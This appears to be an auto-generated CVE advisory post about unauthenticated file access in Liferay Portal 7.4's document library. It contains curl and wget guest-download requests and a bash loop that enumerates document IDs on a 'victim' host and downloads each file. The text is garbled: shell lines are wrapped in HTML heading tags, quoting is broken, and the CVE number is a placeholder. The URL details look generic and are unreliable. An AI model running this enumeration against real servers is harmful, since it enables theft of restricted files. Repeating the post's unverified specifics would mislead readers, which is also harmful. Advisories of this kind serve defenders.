Liferay Portal, Unauthenticated File Access, CVE-2025-XXXX (Moderate)

By /

Listen to this Post

The vulnerability exists in the handling of file requests for the document_library web resource. A flawed permission check allows unauthenticated users (guests) to construct a specific URL pattern that bypasses authorization mechanisms. By appending a crafted parameter or path to a known endpoint, the request is not properly validated against the associated access control lists (ACLs). This misconfiguration enables direct retrieval of files uploaded via forms, which are intended to be restricted, by guessing or discovering their object identifiers and storage paths, leading to unauthorized information disclosure.
Platform: Liferay Portal/DXP
Version: 7.4.0 – 7.4.3.132
Vulnerability: File Access
Severity: Moderate

date: 2025-08-20

Prediction: 2025-09-17

What Undercode Say:

`curl -s “http://target:8080/documents/12345/0/secret_file.pdf?download=true”`
wget --content-disposition http://target:8080/doclib/guest_download/9876`
<h2 style="color: blue;">!/bin/bash</h2>
<h2 style="color: blue;">for i in {10000..10100}; do</h2>
` curl -f "http://victim:8080/documents/$i/0/" -o "doc_$i.tmp"`
<h2 style="color: blue;">done`

How Exploit:

Craft URL to document_library resource.

Protection from this CVE

Apply access control patch. Restrict guest permissions. Filter library requests.

Impact:

Unauthenticated file disclosure. Sensitive data exposure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top